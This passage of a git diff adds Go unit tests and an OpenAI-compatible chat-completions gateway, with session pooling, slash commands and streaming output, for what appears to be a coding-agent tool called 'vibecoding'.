+	srv := newTestServer(t)
+	result := srv.cmdSkills()
+	if !strings.Contains(result.Message, "No skills found") {
+		t.Errorf("expected no skills message, got %q", result.Message)
+	}
+}
+
+func TestCommands_Help(t *testing.T) {
+	srv := newTestServer(t)
+	result := srv.cmdHelp()
+	for _, cmd := range []string{"/clear", "/mode", "/model", "/compact", "/help"} {
+		if !strings.Contains(result.Message, cmd) {
+			t.Errorf("help missing %s", cmd)
+		}
+	}
+}
+
+// --- Chat handler method-not-allowed test ---
+
+func TestChatHandler_MethodNotAllowed(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	req := httptest.NewRequest("GET", "/v1/chat/completions", nil)
+	w := httptest.NewRecorder()
+	srv.handleChatCompletions(w, req)
+
+	if w.Code != http.StatusMethodNotAllowed {
+		t.Errorf("status = %d, want 405", w.Code)
+	}
+}
+
+// --- Type helper tests ---
+
+func TestNewCompletionID(t *testing.T) {
+	id := newCompletionID()
+	if !strings.HasPrefix(id, "chatcmpl-") {
+		t.Errorf("id = %q, want chatcmpl- prefix", id)
+	}
+}
+
+func TestNewCommandCompletionID(t *testing.T) {
+	id := newCommandCompletionID()
+	if !strings.HasPrefix(id, "chatcmpl-cmd-") {
+		t.Errorf("id = %q, want chatcmpl-cmd- prefix", id)
+	}
+}
+
+func TestStringPtr(t *testing.T) {
+	p := stringPtr("test")
+	if *p != "test" {
+		t.Errorf("*p = %q", *p)
+	}
+}
+
+func TestMarshalJSON(t *testing.T) {
+	data := marshalJSON(map[string]string{"key": "val"})
+	if !strings.Contains(string(data), "key") {
+		t.Errorf("data = %s", data)
+	}
+}
+
+// --- langFromPath extended tests ---
+
+func TestLangFromPath(t *testing.T) {
+	tests := []struct {
+		path string
+		want string
+	}{
+		{"main.go", "go"},
+		{"app.py", "python"},
+		{"index.js", "javascript"},
+		{"app.ts", "typescript"},
+		{"comp.tsx", "tsx"},
+		{"comp.jsx", "jsx"},
+		{"main.rs", "rust"},
+		{"app.rb", "ruby"},
+		{"Main.java", "java"},
+		{"main.c", "c"},
+		{"main.h", "c"},
+		{"main.cpp", "cpp"},
+		{"main.cc", "cpp"},
+		{"main.cs", "csharp"},
+		{"main.swift", "swift"},
+		{"main.kt", "kotlin"},
+		{"script.sh", "bash"},
+		{"script.bash", "bash"},
+		{"script.zsh", "zsh"},
+		{"script.ps1", "powershell"},
+		{"query.sql", "sql"},
+		{"index.html", "html"},
+		{"style.css", "css"},
+		{"style.scss", "scss"},
+		{"data.json", "json"},
+		{"config.yaml", "yaml"},
+		{"config.yml", "yaml"},
+		{"config.toml", "toml"},
+		{"data.xml", "xml"},
+		{"README.md", "markdown"},
+		{"main.tf", "hcl"},
+		{"main.lua", "lua"},
+		{"main.php", "php"},
+		{"main.pl", "perl"},
+		{"main.ex", "elixir"},
+		{"main.erl", "erlang"},
+		{"main.hs", "haskell"},
+		{"main.scala", "scala"},
+		{"main.clj", "clojure"},
+		{"main.vim", "vim"},
+		{"schema.proto", "protobuf"},
+		{"schema.graphql", "graphql"},
+		{"config.ini", "ini"},
+		{".env", "bash"},
+		{"Makefile", "makefile"},
+		{"Dockerfile", "dockerfile"},
+		{"Gemfile", "ruby"},
+		{"unknown.xyz", ""},
+	}
+	for _, tt := range tests {
+		t.Run(tt.path, func(t *testing.T) {
+			got := langFromPath(tt.path)
+			if got != tt.want {
+				t.Errorf("langFromPath(%q) = %q, want %q", tt.path, got, tt.want)
+			}
+		})
+	}
+}
+
+// --- formatToolHeaderMD tests ---
+
+func TestFormatToolHeaderMD(t *testing.T) {
+	got := formatToolHeaderMD("read", map[string]any{"path": "main.go"})
+	if got != "🔧 read: main.go" {
+		t.Errorf("got %q", got)
+	}
+	got2 := formatToolHeaderMD("plan", nil)
+	if got2 != "🔧 plan" {
+		t.Errorf("got %q", got2)
+	}
+}
+
+// --- formatToolHeader tests ---
+
+func TestFormatToolHeader(t *testing.T) {
+	got := formatToolHeader("bash", map[string]any{"command": "ls"})
+	if got != "🔧 [bash] ls" {
+		t.Errorf("got %q", got)
+	}
+	got2 := formatToolHeader("plan", nil)
+	if got2 != "🔧 [plan]" {
+		t.Errorf("got %q", got2)
+	}
+}
+
+// --- toolKeyArg: bash long command truncation ---
+
+func TestToolKeyArg_BashLongCommand(t *testing.T) {
+	longCmd := strings.Repeat("a", 200)
+	got := toolKeyArg("bash", map[string]any{"command": longCmd})
+	if len(got) > 124 { // 120 + "..."
+		t.Errorf("expected truncated, got len %d", len(got))
+	}
+	if !strings.HasSuffix(got, "...") {
+		t.Error("expected ... suffix")
+	}
+}
+
+// --- GatewaySession Touch/Lock ---
+
+func TestGatewaySession_Touch(t *testing.T) {
+	sess := &GatewaySession{ID: "s1"}
+	sess.Touch()
+	if sess.LastUsed.IsZero() {
+		t.Error("expected non-zero LastUsed after Touch")
+	}
+}
+
+func TestGatewaySession_LockUnlock(t *testing.T) {
+	sess := &GatewaySession{ID: "s1"}
+	sess.Lock()
+	sess.Unlock()
+	// No panic = pass
+}
+
+// --- Default session ID tests ---
+
+func TestDefaultSessionID_EmptyReusesSession(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	// First request without x_session_id — should create a session
+	body1 := `{"messages":[{"role":"user","content":"/status"}],"stream":false}`
+	req1 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body1))
+	w1 := httptest.NewRecorder()
+	srv.handleChatCompletions(w1, req1)
+
+	if w1.Code != http.StatusOK {
+		t.Fatalf("req1 status = %d, body = %s", w1.Code, w1.Body.String())
+	}
+	var resp1 ChatCompletionResponse
+	json.NewDecoder(w1.Body).Decode(&resp1)
+	sessID1 := resp1.XSessionID
+	if sessID1 == "" {
+		t.Fatal("first request should return a session ID")
+	}
+
+	// Second request without x_session_id — should reuse the same session
+	body2 := `{"messages":[{"role":"user","content":"/status"}],"stream":false}`
+	req2 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body2))
+	w2 := httptest.NewRecorder()
+	srv.handleChatCompletions(w2, req2)
+
+	if w2.Code != http.StatusOK {
+		t.Fatalf("req2 status = %d", w2.Code)
+	}
+	var resp2 ChatCompletionResponse
+	json.NewDecoder(w2.Body).Decode(&resp2)
+
+	if resp2.XSessionID != sessID1 {
+		t.Errorf("second request should reuse session: got %q, want %q", resp2.XSessionID, sessID1)
+	}
+}
+
+func TestDefaultSessionID_ExplicitIDOverrides(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	// First request without x_session_id
+	body1 := `{"messages":[{"role":"user","content":"/status"}],"stream":false}`
+	req1 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body1))
+	w1 := httptest.NewRecorder()
+	srv.handleChatCompletions(w1, req1)
+	var resp1 ChatCompletionResponse
+	json.NewDecoder(w1.Body).Decode(&resp1)
+	defaultID := resp1.XSessionID
+
+	// Second request WITH explicit x_session_id — should use that, not default
+	body2 := `{"messages":[{"role":"user","content":"/status"}],"stream":false,"x_session_id":"explicit-sess"}`
+	req2 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body2))
+	w2 := httptest.NewRecorder()
+	srv.handleChatCompletions(w2, req2)
+	var resp2 ChatCompletionResponse
+	json.NewDecoder(w2.Body).Decode(&resp2)
+
+	if resp2.XSessionID != "explicit-sess" {
+		t.Errorf("explicit session should be used: got %q", resp2.XSessionID)
+	}
+
+	// Third request without x_session_id — should still use the default, not "explicit-sess"
+	body3 := `{"messages":[{"role":"user","content":"/status"}],"stream":false}`
+	req3 := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body3))
+	w3 := httptest.NewRecorder()
+	srv.handleChatCompletions(w3, req3)
+	var resp3 ChatCompletionResponse
+	json.NewDecoder(w3.Body).Decode(&resp3)
+
+	if resp3.XSessionID != defaultID {
+		t.Errorf("third request should reuse default: got %q, want %q", resp3.XSessionID, defaultID)
+	}
+}
+
+func TestDefaultSessionID_PoolCount(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
+	// Multiple requests without x_session_id should all share one session
+	for i := 0; i < 5; i++ {
+		body := `{"messages":[{"role":"user","content":"/help"}],"stream":false}`
+		req := httptest.NewRequest("POST", "/v1/chat/completions", strings.NewReader(body))
+		w := httptest.NewRecorder()
+		srv.handleChatCompletions(w, req)
+	}
+
+	if srv.pool.Count() != 1 {
+		t.Errorf("pool count = %d, want 1 (all should share default session)", srv.pool.Count())
+	}
+}
diff --git a/internal/gateway/handler_chat.go b/internal/gateway/handler_chat.go
new file mode 100644
index 0000000..e4d9abe
--- /dev/null
+++ b/internal/gateway/handler_chat.go
@@ -0,0 +1,559 @@
+package gateway
+
+import (
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+func (s *Server) handleChatCompletions(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodPost {
+		writeError(w, http.StatusMethodNotAllowed, "method not allowed", "invalid_request_error")
+		return
+	}
+
+	body, err := io.ReadAll(io.LimitReader(r.Body, 10<<20)) // 10MB limit
+	if err != nil {
+		writeError(w, http.StatusBadRequest, "failed to read request body", "invalid_request_error")
+		return
+	}
+	defer r.Body.Close()
+
+	var req ChatCompletionRequest
+	if err := json.Unmarshal(body, &req); err != nil {
+		writeError(w, http.StatusBadRequest, "invalid JSON: "+err.Error(), "invalid_request_error")
+		return
+	}
+
+	if len(req.Messages) == 0 {
+		writeError(w, http.StatusBadRequest, "messages array is required and must not be empty", "invalid_request_error")
+		return
+	}
+
+	// Validate x_working_dir
+	workDir := s.cfg.GetWorkDir()
+	if req.XWorkingDir != "" {
+		if err := s.cfg.ValidateWorkDir(req.XWorkingDir); err != nil {
+			writeError(w, http.StatusForbidden, err.Error(), "permission_error")
+			return
+		}
+		workDir = req.XWorkingDir
+	}
+
+	// Resolve model
+	s.mu.RLock()
+	currentModel := s.model
+	currentProvider := s.provider
+	s.mu.RUnlock()
+
+	if req.Model != "" {
+		if m := currentProvider.GetModel(req.Model); m != nil {
+			currentModel = m
+		}
+	}
+	currentModel = cloneModel(currentModel)
+
+	// Extract last user message
+	lastUserMsg, systemMsgs, historyMsgs := parseMessages(req.Messages)
+	if lastUserMsg == "" {
+		writeError(w, http.StatusBadRequest, "no user message found", "invalid_request_error")
+		return
+	}
+
+	// Get or create session
+	sessionID := req.XSessionID
+	if sessionID == "" {
+		// Fall back to the default session for this gateway instance
+		s.mu.RLock()
+		sessionID = s.defaultSessionID
+		s.mu.RUnlock()
+	}
+	sess := s.getOrCreateSession(sessionID, workDir)
+	if sess == nil {
+		writeError(w, http.StatusServiceUnavailable, "session pool is at capacity", "server_error")
+		return
+	}
+
+	// Check for slash command
+	if cmdResult := s.handleCommand(sess, lastUserMsg); cmdResult != nil {
+		// If /clear, we need to reset agent state on the session
+		if strings.HasPrefix(strings.TrimSpace(lastUserMsg), "/clear") {
+			// Create a fresh session manager but keep the session slot
+			newMgr := session.New(sess.WorkDir, s.settings.GetSessionDir())
+			if err := newMgr.Init(); err == nil {
+				sess.Manager = newMgr
+			}
+		}
+		if req.Stream {
+			s.writeCommandResponseStreaming(w, cmdResult, currentModel.ID, sess.ID, lastUserMsg)
+		} else {
+			s.writeCommandResponse(w, cmdResult, currentModel.ID, sess.ID, lastUserMsg)
+		}
+		return
+	}
+
+	// Lock session for serial processing
+	sess.Lock()
+	defer sess.Unlock()
+	sess.Touch()
+
+	// Determine mode
+	mode := s.cfg.DefaultMode
+	if sess.Mode != "" {
+		mode = sess.Mode
+	}
+	if req.XMode != "" {
+		mode = req.XMode
+	}
+
+	// Build extra context: system prompt handling
+	extraContext := s.extraContext
+	if s.cfg.SystemPromptMode == "append" && len(systemMsgs) > 0 {
+		extraContext += "\n## Client Instructions\n" + strings.Join(systemMsgs, "\n") + "\n"
+	}
+
+	// Build compaction settings
+	compactionSettings := ctxpkg.CompactionSettings{
+		Enabled:          s.settings.Compaction.Enabled,
+		ReserveTokens:    s.settings.Compaction.ReserveTokens,
+		KeepRecentTokens: s.settings.Compaction.KeepRecentTokens,
+	}
+	if compactionSettings.ReserveTokens == 0 {
+		compactionSettings.ReserveTokens = 16384
+	}
+	if compactionSettings.KeepRecentTokens == 0 {
+		compactionSettings.KeepRecentTokens = 20000
+	}
+
+	// Build agent config
+	thinkingLevel := provider.ThinkingLevel(s.cfg.DefaultThinkingLevel)
+	if thinkingLevel == "" {
+		thinkingLevel = provider.ThinkingLevel(s.settings.DefaultThinkingLevel)
+	}
+
+	maxTokens := s.settings.MaxOutputTokens
+	if req.MaxTokens > 0 {
+		maxTokens = req.MaxTokens
+	}
+
+	// Per-request temperature/top_p override (from OpenAI-compatible client)
+	if req.Temperature != nil {
+		currentModel.Temperature = req.Temperature
+	}
+	if req.TopP != nil {
+		currentModel.TopP = req.TopP
+	}
+
+	// Register sub-agent tools before agent construction; the agent freezes tools at New().
+	if s.cfg.EnableSubAgents && sess.AgentMgr != nil {
+		sess.Registry.Register(agent.NewSubAgentSpawnTool(sess.AgentMgr))
+		sess.Registry.Register(agent.NewSubAgentStatusTool(sess.AgentMgr))
+		sess.Registry.Register(agent.NewSubAgentSendTool(sess.AgentMgr))
+		sess.Registry.Register(agent.NewSubAgentDestroyTool(sess.AgentMgr))
+	}
+
+	agentCfg := agent.Config{
+		Provider:           currentProvider,
+		Model:              currentModel,
+		Mode:               mode,
+		ThinkingLevel:      thinkingLevel,
+		MaxTokens:          maxTokens,
+		SandboxMgr:         s.sandboxMgr,
+		Settings:           s.settings,
+		Session:            sess.Manager,
+		ExtraContext:       extraContext,
+		CompactionSettings: compactionSettings,
+		MultiAgent:         s.cfg.EnableSubAgents,
+	}
+
+	a := agent.New(agentCfg, sess.Registry)
+
+	// Apply force compact flag from /compact command
+	if sess.ForceCompact {
+		a.SetForceCompact()
+		sess.ForceCompact = false
+	}
+
+	// Load history if this is a new session with client-provided history
+	if len(historyMsgs) > 0 && len(sess.Manager.GetMessages()) == 0 {
+		internalMsgs := convertHistoryMessages(historyMsgs)
+		a.LoadHistoryMessages(internalMsgs)
+	}
+
+	// Setup request timeout
+	timeout := time.Duration(s.cfg.RequestTimeoutSecs) * time.Second
+	ctx, cancel := context.WithTimeout(r.Context(), timeout)
+	defer cancel()
+	if s.cfg.EnableSubAgents && sess.AgentMgr != nil {
+		sess.AgentMgr.Register(agent.NewAgentAdapter(a))
+		defer func() {
+			sess.AgentMgr.Finish(a.ID(), ctx.Err())
+		}()
+	}
+
+	// Run agent
+	eventCh := a.Run(ctx, lastUserMsg)
+
+	if req.Stream {
+		s.handleStreamingResponse(w, r, eventCh, currentModel.ID, sess.ID)
+	} else {
+		s.handleNonStreamingResponse(w, eventCh, currentModel.ID, sess.ID)
+	}
+}
+
+func cloneModel(model *provider.Model) *provider.Model {
+	if model == nil {
+		return nil
+	}
+	copy := *model
+	copy.Input = append([]string(nil), model.Input...)
+	if model.Compat != nil {
+		compat := *model.Compat
+		copy.Compat = &compat
+	}
+	return &copy
+}
+
+func (s *Server) handleStreamingResponse(w http.ResponseWriter, r *http.Request, eventCh <-chan agent.Event, modelID, sessionID string) {
+	sse := NewSSEWriter(w, modelID, sessionID)
+	sse.WriteRoleDelta()
+
+	toolMode := s.cfg.ToolVisibility.Mode
+	toolDetail := s.cfg.GetToolDetail()
+	var totalUsage CompletionUsage
+	var xToolCalls []XToolCall
+	// Track in-flight tool calls by callID so we can attach result/diff on end.
+	pendingTools := make(map[string]*toolCallInfo)
+
+	for ev := range eventCh {
+		select {
+		case <-r.Context().Done():
+			return
+		default:
+		}
+
+		switch ev.Type {
+		case agent.EventTextDelta:
+			sse.WriteContentDelta(ev.TextDelta)
+
+		case agent.EventToolCall:
+			name, callID := resolveToolEvent(ev)
+			tc := &toolCallInfo{Name: name, Args: ev.ToolArgs, Status: "running"}
+			if callID != "" {
+				pendingTools[callID] = tc
+			}
+			xToolCalls = append(xToolCalls, XToolCall{Name: name, Args: ev.ToolArgs, Status: "running"})
+			switch toolMode {
+			case "content":
+				sse.WriteContentDelta(formatToolRunning(name, ev.ToolArgs))
+			case "sse_event":
+				sse.WriteToolStatusEvent(name, "running", ev.ToolArgs)
+			}
+
+		case agent.EventToolExecutionEnd:
+			status := "completed"
+			if ev.ToolError != nil {
+				status = "failed"
+			}
+			// Update xToolCalls status
+			for i := len(xToolCalls) - 1; i >= 0; i-- {
+				if xToolCalls[i].Name == ev.ToolName && xToolCalls[i].Status == "running" {
+					xToolCalls[i].Status = status
+					break
+				}
+			}
+			// Build expanded output
+			tc := pendingTools[ev.ToolCallID]
+			if tc == nil {
+				tc = &toolCallInfo{Name: ev.ToolName, Args: ev.ToolArgs}
+			}
+			tc.Status = status
+			tc.Result = ev.ToolResult
+			tc.Diff = ev.ToolDiff
+			tc.Error = ev.ToolError
+			delete(pendingTools, ev.ToolCallID)
+
+			switch toolMode {
+			case "content":
+				sse.WriteToolResult(tc, toolDetail)
+			case "sse_event":
+				sse.WriteToolStatusEvent(ev.ToolName, status, nil)
+			}
+
+		case agent.EventUsage:
+			if ev.Usage != nil {
+				totalUsage.PromptTokens += ev.Usage.TotalInputTokens()
+				totalUsage.CompletionTokens += ev.Usage.Output
+				totalUsage.TotalTokens = totalUsage.PromptTokens + totalUsage.CompletionTokens
+			}
+
+		case agent.EventDone:
+			sse.WriteDone(&totalUsage)
+			return
+
+		case agent.EventError:
+			if ev.Error != nil {
+				sse.WriteError(ev.Error.Error())
+			} else {
+				sse.WriteDone(&totalUsage)
+			}
+			return
+		}
+	}
+	// Channel closed without EventDone
+	sse.WriteDone(&totalUsage)
+}
+
+func (s *Server) handleNonStreamingResponse(w http.ResponseWriter, eventCh <-chan agent.Event, modelID, sessionID string) {
+	var sb strings.Builder
+	var totalUsage CompletionUsage
+	var xToolCalls []XToolCall
+	toolMode := s.cfg.ToolVisibility.Mode
+	toolDetail := s.cfg.GetToolDetail()
+	pendingTools := make(map[string]*toolCallInfo)
+
+	for ev := range eventCh {
+		switch ev.Type {
+		case agent.EventTextDelta:
+			sb.WriteString(ev.TextDelta)
+
+		case agent.EventToolCall:
+			name, callID := resolveToolEvent(ev)
+			tc := &toolCallInfo{Name: name, Args: ev.ToolArgs, Status: "running"}
+			if callID != "" {
+				pendingTools[callID] = tc
+			}
+			xToolCalls = append(xToolCalls, XToolCall{Name: name, Args: ev.ToolArgs, Status: "running"})
+
+		case agent.EventToolExecutionEnd:
+			status := "completed"
+			if ev.ToolError != nil {
+				status = "failed"
+			}
+			for i := len(xToolCalls) - 1; i >= 0; i-- {
+				if xToolCalls[i].Name == ev.ToolName && xToolCalls[i].Status == "running" {
+					xToolCalls[i].Status = status
+					break
+				}
+			}
+			// Build expanded output for content/none mode
+			tc := pendingTools[ev.ToolCallID]
+			if tc == nil {
+				tc = &toolCallInfo{Name: ev.ToolName, Args: ev.ToolArgs}
+			}
+			tc.Status = status
+			tc.Result = ev.ToolResult
+			tc.Diff = ev.ToolDiff
+			tc.Error = ev.ToolError
+			delete(pendingTools, ev.ToolCallID)
+
+			if toolMode == "content" {
+				sb.WriteString(formatToolResult(tc, toolDetail))
+			}
+
+		case agent.EventUsage:
+			if ev.Usage != nil {
+				totalUsage.PromptTokens += ev.Usage.TotalInputTokens()
+				totalUsage.CompletionTokens += ev.Usage.Output
+				totalUsage.TotalTokens = totalUsage.PromptTokens + totalUsage.CompletionTokens
+			}
+
+		case agent.EventError:
+			if ev.Error != nil {
+				writeError(w, http.StatusInternalServerError, ev.Error.Error(), "server_error")
+				return
+			}
+		}
+	}
+
+	finishReason := "stop"
+	resp := ChatCompletionResponse{
+		ID:      newCompletionID(),
+		Object:  "chat.completion",
+		Created: time.Now().Unix(),
+		Model:   modelID,
+		Choices: []ChatCompletionChoice{
+			{
+				Index:        0,
+				Message:      &ResponseMessage{Role: "assistant", Content: sb.String()},
+				FinishReason: &finishReason,
+			},
+		},
+		Usage:      &totalUsage,
+		XSessionID: sessionID,
+		XToolCalls: xToolCalls,
+	}
+	writeJSON(w, http.StatusOK, resp)
+}
+
+func (s *Server) writeCommandResponse(w http.ResponseWriter, result *CommandResult, modelID, sessionID, cmd string) {
+	finishReason := "stop"
+	resp := ChatCompletionResponse{
+		ID:      newCommandCompletionID(),
+		Object:  "chat.completion",
+		Created: time.Now().Unix(),
+		Model:   modelID,
+		Choices: []ChatCompletionChoice{
+			{
+				Index:        0,
+				Message:      &ResponseMessage{Role: "assistant", Content: result.Message},
+				FinishReason: &finishReason,
+			},
+		},
+		Usage:      &CompletionUsage{},
+		XSessionID: sessionID,
+		XCommand:   strings.Fields(cmd)[0],
+	}
+	writeJSON(w, http.StatusOK, resp)
+}
+
+func (s *Server) writeCommandResponseStreaming(w http.ResponseWriter, result *CommandResult, modelID, sessionID, cmd string) {
+	sse := NewSSEWriter(w, modelID, sessionID)
+	sse.WriteRoleDelta()
+	sse.WriteContentDelta(result.Message)
+	sse.WriteDone(&CompletionUsage{})
+}
+
+// getOrCreateSession returns an existing session or creates a new one.
+func (s *Server) getOrCreateSession(sessionID, workDir string) *GatewaySession {
+	if sessionID != "" {
+		if sess := s.pool.Get(sessionID); sess != nil {
+			return sess
+		}
+	}
+
+	// Create new session
+	mgr := session.New(workDir, s.settings.GetSessionDir())
+	if sessionID != "" {
+		if err := mgr.InitWithID(sessionID); err != nil {
+			// Fallback to auto-generated ID
+			if err := mgr.Init(); err != nil {
+				return nil
+			}
+		}
+	} else {
+		if err := mgr.Init(); err != nil {
+			return nil
+		}
+	}
+
+	id := sessionID
+	if id == "" && mgr.GetHeader() != nil {
+		id = mgr.GetHeader().ID
+	}
+
+	registry := tools.NewRegistry(workDir, s.sandboxMgr.GetActive())
+	registry.RegisterDefaultsWithPlanTool(s.settings.IsPlanToolEnabled())
+	if s.skillsMgr != nil {
+		registry.Register(tools.NewSkillRefTool(s.skillsMgr))
+	}
+
+	sess := &GatewaySession{
+		ID:       id,
+		WorkDir:  workDir,
+		Manager:  mgr,
+		Registry: registry,
+		Mode:     "",
+		LastUsed: time.Now(),
+	}
+
+	// Create sub-agent manager if enabled
+	if s.cfg.EnableSubAgents {
+		compactionSettings := ctxpkg.CompactionSettings{
+			Enabled:          s.settings.Compaction.Enabled,
+			ReserveTokens:    s.settings.Compaction.ReserveTokens,
+			KeepRecentTokens: s.settings.Compaction.KeepRecentTokens,
+		}
+		factory := agent.NewAgentFactory(s.provider, s.model, s.settings, s.sandboxMgr, s.extraContext, compactionSettings, nil)
+		sess.AgentMgr = agent.NewAgentManager(factory)
+	}
+
+	if err := s.pool.Put(sess); err != nil {
+		return nil
+	}
+
+	// If this session was created without a client-supplied ID,
+	// remember it as the default so subsequent empty x_session_id
+	// requests reuse the same session.
+	if sessionID == "" {
+		s.mu.Lock()
+		if s.defaultSessionID == "" {
+			s.defaultSessionID = sess.ID
+		}
+		s.mu.Unlock()
+	}
+
+	return sess
+}
+
+// parseMessages extracts the last user message, system messages, and history messages.
+func parseMessages(msgs []RequestMessage) (lastUser string, systemMsgs []string, history []RequestMessage) {
+	for _, m := range msgs {
+		switch m.Role {
+		case "system":
+			systemMsgs = append(systemMsgs, m.Content)
+		}
+	}
+
+	// Find the last user message
+	lastIdx := -1
+	for i := len(msgs) - 1; i >= 0; i-- {
+		if msgs[i].Role == "user" {
+			lastIdx = i
+			break
+		}
+	}
+	if lastIdx < 0 {
+		return "", systemMsgs, nil
+	}
+	lastUser = msgs[lastIdx].Content
+
+	// Everything before the last user message (excluding system) is history
+	for i := 0; i < lastIdx; i++ {
+		if msgs[i].Role != "system" {
+			history = append(history, msgs[i])
+		}
+	}
+	return lastUser, systemMsgs, history
+}
+
+// convertHistoryMessages converts OpenAI-format history to internal provider.Message.
+func convertHistoryMessages(msgs []RequestMessage) []provider.Message {
+	result := make([]provider.Message, 0, len(msgs))
+	for _, m := range msgs {
+		switch m.Role {
+		case "user":
+			result = append(result, provider.NewUserMessage(m.Content))
+		case "assistant":
+			result = append(result, provider.NewAssistantMessage([]provider.ContentBlock{
+				{Type: "text", Text: m.Content},
+			}))
+		}
+	}
+	return result
+}
+
+// resolveToolEvent extracts tool name and call ID from an agent event,
+// falling back to ToolCall fields when top-level fields are empty.
+func resolveToolEvent(ev agent.Event) (name string, callID string) {
+	name = ev.ToolName
+	callID = ev.ToolCallID
+	if ev.ToolCall != nil {
+		if name == "" {
+			name = ev.ToolCall.Name
+		}
+		if callID == "" {
+			callID = ev.ToolCall.ID
+		}
+	}
+	return name, callID
+}
diff --git a/internal/gateway/handler_health.go b/internal/gateway/handler_health.go
new file mode 100644
index 0000000..1c71312
--- /dev/null
+++ b/internal/gateway/handler_health.go
@@ -0,0 +1,17 @@
+package gateway
+
+import "net/http"
+
+func (s *Server) handleHealth(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		writeError(w, http.StatusMethodNotAllowed, "method not allowed", "invalid_request_error")
+		return
+	}
+
+	resp := HealthResponse{
+		Status:   "ok",
+		Version:  s.version,
+		Sessions: s.pool.Count(),
+	}
+	writeJSON(w, http.StatusOK, resp)
+}
diff --git a/internal/gateway/handler_models.go b/internal/gateway/handler_models.go
new file mode 100644
index 0000000..8fff498
--- /dev/null
+++ b/internal/gateway/handler_models.go
@@ -0,0 +1,30 @@
+package gateway
+
+import (
+	"net/http"
+	"time"
+)
+
+func (s *Server) handleModels(w http.ResponseWriter, r *http.Request) {
+	if r.Method != http.MethodGet {
+		writeError(w, http.StatusMethodNotAllowed, "method not allowed", "invalid_request_error")
+		return
+	}
+
+	models := s.provider.Models()
+	items := make([]ModelItem, 0, len(models))
+	for _, m := range models {
+		items = append(items, ModelItem{
+			ID:      m.ID,
+			Object:  "model",
+			Created: time.Now().Unix(),
+			OwnedBy: "vibecoding",
+		})
+	}
+
+	resp := ModelListResponse{
+		Object: "list",
+		Data:   items,
+	}
+	writeJSON(w, http.StatusOK, resp)
+}
diff --git a/internal/gateway/session_mgr.go b/internal/gateway/session_mgr.go
new file mode 100644
index 0000000..56387fc
--- /dev/null
+++ b/internal/gateway/session_mgr.go
@@ -0,0 +1,145 @@
+package gateway
+
+import (
+	"sync"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// GatewaySession holds state for a single gateway session.
+type GatewaySession struct {
+	ID       string
+	WorkDir  string
+	Manager  *session.Manager
+	Registry *tools.Registry
+	AgentMgr *agent.AgentManager // nil unless sub-agents enabled
+	Mode     string             // session-level mode override
+	LastUsed time.Time
+	mu       sync.Mutex // serializes requests within this session
+
+	// ForceCompact is set by /compact command and consumed by the next agent run.
+	ForceCompact bool
+}
+
+// Lock acquires the session lock (one request at a time per session).
+func (s *GatewaySession) Lock()   { s.mu.Lock() }
+// Unlock releases the session lock.
+func (s *GatewaySession) Unlock() { s.mu.Unlock() }
+
+// Touch updates the last-used timestamp.
+func (s *GatewaySession) Touch() { s.LastUsed = time.Now() }
+
+// SessionPool manages multiple concurrent gateway sessions.
+type SessionPool struct {
+	mu       sync.RWMutex
+	sessions map[string]*GatewaySession
+	maxSess  int
+	idleTTL  time.Duration
+	stopCh   chan struct{}
+}
+
+// NewSessionPool creates a session pool.
+func NewSessionPool(maxSessions int, idleTimeout time.Duration) *SessionPool {
+	p := &SessionPool{
+		sessions: make(map[string]*GatewaySession),
+		maxSess:  maxSessions,
+		idleTTL:  idleTimeout,
+		stopCh:   make(chan struct{}),
+	}
+	if idleTimeout > 0 {
+		go p.cleanupLoop()
+	}
+	return p
+}
+
+// Get returns an existing session by ID, or nil.
+func (p *SessionPool) Get(id string) *GatewaySession {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+	return p.sessions[id]
+}
+
+// Put adds a session to the pool. Returns an error if the pool is at capacity.
+func (p *SessionPool) Put(s *GatewaySession) error {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	if p.maxSess > 0 && len(p.sessions) >= p.maxSess {
+		// Check if we have an existing entry (replace is OK)
+		if _, exists := p.sessions[s.ID]; !exists {
+			return &PoolFullError{Max: p.maxSess}
+		}
+	}
+	s.Touch()
+	p.sessions[s.ID] = s
+	return nil
+}
+
+// Remove removes a session by ID.
+func (p *SessionPool) Remove(id string) {
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	delete(p.sessions, id)
+}
+
+// Count returns the number of active sessions.
+func (p *SessionPool) Count() int {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+	return len(p.sessions)
+}
+
+// List returns all session IDs.
+func (p *SessionPool) List() []string {
+	p.mu.RLock()
+	defer p.mu.RUnlock()
+	ids := make([]string, 0, len(p.sessions))
+	for id := range p.sessions {
+		ids = append(ids, id)
+	}
+	return ids
+}
+
+// Stop shuts down the cleanup goroutine.
+func (p *SessionPool) Stop() {
+	close(p.stopCh)
+}
+
+// cleanupLoop periodically removes idle sessions.
+func (p *SessionPool) cleanupLoop() {
+	ticker := time.NewTicker(60 * time.Second)
+	defer ticker.Stop()
+	for {
+		select {
+		case <-p.stopCh:
+			return
+		case <-ticker.C:
+			p.evictIdle()
+		}
+	}
+}
+
+func (p *SessionPool) evictIdle() {
+	if p.idleTTL <= 0 {
+		return
+	}
+	now := time.Now()
+	p.mu.Lock()
+	defer p.mu.Unlock()
+	for id, s := range p.sessions {
+		if now.Sub(s.LastUsed) > p.idleTTL {
+			delete(p.sessions, id)
+		}
+	}
+}
+
